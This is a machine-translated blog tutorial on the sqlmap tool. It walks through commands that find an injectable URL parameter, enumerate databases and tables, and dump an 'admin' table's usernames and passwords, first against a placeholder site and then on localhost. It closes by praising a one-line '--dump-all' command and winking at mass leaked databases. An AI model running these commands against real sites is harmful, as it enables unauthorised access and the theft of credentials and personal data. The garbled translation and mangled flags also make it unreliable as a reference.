"Security Tools" injection artifact Sqlmap

Original: "Security Tools" injection artifact Sqlmap

Pic by Baidu

0x 00 Preface

It is sqlmap this artifact exists, SQL injection is simply easy to stop ....

PS: Similar software in China also has a D, Ming boy, Excavator, when you have used them, you will find Sqlmap is the absolute injection artifact

0x 01 Injection principle

Start Split Line *****************************************

Time reason, this part of the content will not be written first

It's because it's so important that I have to sort it out.

Although in fact I still do not understand that I would utter:)

End Split Line *****************************************

0x 02 Mounting Sqlmap

　　1. Install Python

Official website https://www.python.org/Select the latest version to download and install

Because Sqlmap is written in Python, no Python environment Sqlmap to run

　　2. Installing Sqlmap

Official website http://sqlmap.org/Select the latest version to install

　　3. Setting Environment variables

For ease of use, add the Sqlmap installation directory to the system environment variable

After that, you can use Sqlmap directly in CMD.

If you do not set the environment variable, you should switch the current directory of CMD to the Sqlmap installation directory to use

0x sqlmap Common Command Introduction

　　1. Sqlmap.py-u "Http://www.XXX.com/index.asp?id=1"

Determine if the ID parameter is injected: The result contains an "id" is vulnerable field that indicates the presence of an injection

There is an injection, the following steps can be performed successfully ~

　　2. Sqlmap.py-u "Http://www.XXX.com/index.asp?id=1"--dbs

Enumerate all database names that can be listed

　　3. Sqlmap.py-u "Http://www.XXX.com/index.asp?id=1"--current-db

Lists the database names currently in use, assuming the "sqltest" database is listed

　　4. Sqlmap.py-u "Http://www.XXX.com/index.asp?id=1"--is-dba

Determine if the injection point has administrator rights: Returns true to indicate an administrator

　　5. Sqlmap.py-u "Http://www.XXX.com/index.asp?id=1"-D "sqltest"--tables

Get all the tables in sqltest, assuming there is an "admin" table

　　6. Sqlmap.py-u "Http://www.XXX.com/index.asp?id=1"-D "sqltest"-t "admin"--columns

List admin field (column name), assuming there is "username", "Password" field

　　7. Sqlmap.py-u "Http://www.XXX.com/index.asp?id=1"-D "sqltest"-T "admin"-C "Username,password"--dump

Download the value of the field Username,password, if asked whether to crack MD5 encryption, select No to

Now, for a simple injection point (get mode), we've got the data we want.

Want to see the tool injection process using the-v parameter

-level will increase the injection level (default 0 will only determine if the Get,post parameter has an injection point)

If the injection point is the post mode, or the injection point is cookie,user-agent, you can use the-date parameter-cookie parameter to specify

Of course, using Buip Suite to frame a proxy, intercept the packet, the direct-r parameter into the packet can also complete the above injection situation ~

0x 04 Injection Demo

This demo uses apache+php +mysql environment, other environment words

Use Sqlmap input or the same command, which is sqlmap good to do

　　　　　　　

Sqlmap.py-u "http://127.0.0.1/sqlinject.php?id=1"--dbs column all database names

　　　　　

Sqlmap.py-u "Http://127.0.0.1/sqlinject.php?id=1"--current-db lists the current database

　　　　

Sqlmap.py-u "http://127.0.0.1/sqlinject.php?id=1"--is-dba determine if the injection point has administrator rights

　　　　

Sqlmap.py-u "Http://127.0.0.1/sqlinject.php?id=1"-D "test"--tables guess table name

　　　　

Sqlmap.py-u "Http://127.0.0.1/sqlinject.php?id=1"-D "test"-t "test"--columns guess field name

　　　　

Sqlmap.py-u "Http://127.0.0.1/sqlinject.php?id=1"-D "test"-T "test"-C "Id,name"--dump guess the value of ID and name

　　　　

　　　　

On the internet, the pants that are circulating are the following sentence.

Sqlmap.py-u "Http://127.0.0.1/sqlinject.php?id=1"-D "test"--dump-all

Suddenly found that powerful things are often just a word!!

This command will download all the tables in the test database directly to the installation directory output folder

Then there is the 2000W xxx 800W xxx ......... ..... You know

　　　　

"Security Tools" injection artifact Sqlmap